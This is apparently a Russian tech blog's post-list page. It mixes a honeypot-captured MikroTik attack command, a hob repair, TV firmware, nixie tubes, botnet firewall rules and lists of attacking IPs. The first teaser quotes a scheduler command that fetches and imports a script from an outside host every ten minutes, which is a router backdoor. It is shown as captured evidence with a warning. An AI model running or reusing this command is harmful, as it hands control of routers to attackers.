Это перехваченные команды хацкеров через HONEYPOT COWRIE

ВВДИТЬ И ИСПОЛНЯТЬ ИХ НЕЛЬЗЯ! Ну если только очень хочется.)

Перехват хакерских команд через эмулятор терминала SSH cowrie honeypot.

Микротиковский замес

/system scheduler add name="U6" interval=10m on-event="/tool fetch url=http://gamedate.xyz/poll/b94cc680-52b5-4c5a-92f0-37f0a1307729 mode=http dst-path=7wmp0b4s.rsc\r\n/import 7wmp0b4s.rsc" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write,1

и далее
Читать дальше

Слитый с флэш памяти ром для телевизора PANASONIC LED
Model: TX-32AR400

Panel: TPT315B5-DXJSFE
Читать дальше

В ремонт попала Индукционная варочная панель NEFF T66TS61N0.

Особенности модели
Встраиваемая
Цвет: черный
Ширина встраивания: 60 см
Количество зон нагрева: 4
Функция PanBoost
Управление TwistPad® Fire с таймером
Функция увеличения мощности PotBoost
Функция PowerMove
FlexZone
Зона FlexInduction
17 ступеней мощности
Мощность подключения: 7,4 кВт
Размеры прибора (ВxШxГ): 63,3 мм х 606 мм х 546 мм
Производитель: Испания

Модель снята с производства

Последователь: Neff T66TS6RN0 Home Connect

— — — и что с ней?

Особенность неисправности это перестал работать сенсор включения питания.

При сильном и долгом нажатии на сенсорную кнопку варочная панель T66TS61N0 включалась и работала.
Проблема прогрессировала с момента окончания гарантии NEFF.
Странно!

Читать дальше

На али существует магазин FIGHTING NATION Computer Store торгующий всякой электроникой для ПК, клавиатуры мышки и прочая ерунда.
Среди ассортимента есть интересная позиция.
Жесткий Диск TOSHIBA 2 ТБ, для бизнеса,SATA III 7200 об/мин 128 МБ Кэш 3,5 24/7 для DVR NVR видеонаблюдения
Вобщем энтерпрайз, значит можно использовать и в серваке.
Вот так выглядит. Цена около 4500р +- курс и распродажи.



Читать дальше

Есть уникальный человек Dalibor Farný который создаёт газоразрядные индикаторы.

Nixie Tube & Clock Manufacturer.

Его канал в ютубе
www.youtube.com/channel/UC0IY1BQiMehWMvezqWLyk4g
Тут он запарился сиянием проводников идущих к индикатору внутри газоразрядной лампы в PROJECT H(x).
И правильно он сделал что начал искать ответ. Ибо сияние это не есть хорошо. Свечение в газоразрядных индикаторах должно быть там где оно должно быть.


Читать дальше

sudo systemctl set-default multi-user.target

Ботнет 92.63.194.0/24 GRE

Имея внешние ip адреса логах микротика периодически кто-то ломится. То в winbox, но он закрыт из вне, то в VPN. Сейчас капитально присосался какой-то ботнет с подсети 92.63.194.0/24

Что он делает?

Ломится подбирая нелепые логины, ну и ладно бы, но залипли установленные соединения и удалить их нельзя -они восстанавливаются.

Вот зараза !
92.63.194.155
92.63.194.158
92.63.194.156
92.63.194.40
92.63.194.91
92.63.194.35
92.63.194.69
92.63.194.41
92.63.194.155
92.63.194.93
92.63.194.92
92.63.194.159
92.63.194.157

Что делать?

Сперва добавлять нижеприведённые правила и шиться последней прошивкой.

/ip firewall raw
add action=drop chain=prerouting src-address-list=Botlist
/ip firewall address-list
add address=92.63.194.0/24 list=Botlist

Теперь осталось только ждать новых и добавлять их в Botlist

А вот список файлов в которые пытаюся впихнуть гадкий код с помощью POST запросов

417.509.php
accept.client.php
accept.json.php
accepted.sess.php
accepted.tools.php
assets
bad.except.php
body.work.php
code.sessions.php
conflicts.link.php
content.img.php
cookie.media.php
data.using.php
database.class.php
database.http.php
exception.config.php
exceptions.throw.php
exceptions.work.php
fail.lib.php
Читать дальше

А вот ip адреса прокси серверов которые используются для атак на движки сайтов

Порты конечно же не указываю так как я не распространитель инфы об актуальных прокси листах, а просто собрал атаки с этих адресов
Список прокси
1.10.207.236
1.2.188.5
1.20.227.241
101.108.96.117
101.109.102.58
101.50.1.2
Читать дальше

Уроды которые ломают движки сайтов краткий список ip адресов

100.101.32.64
100.102.57.0
100.106.68.64
100.108.113.64
100.118.156.0
100.123.159.128
100.125.196.64
Читать дальше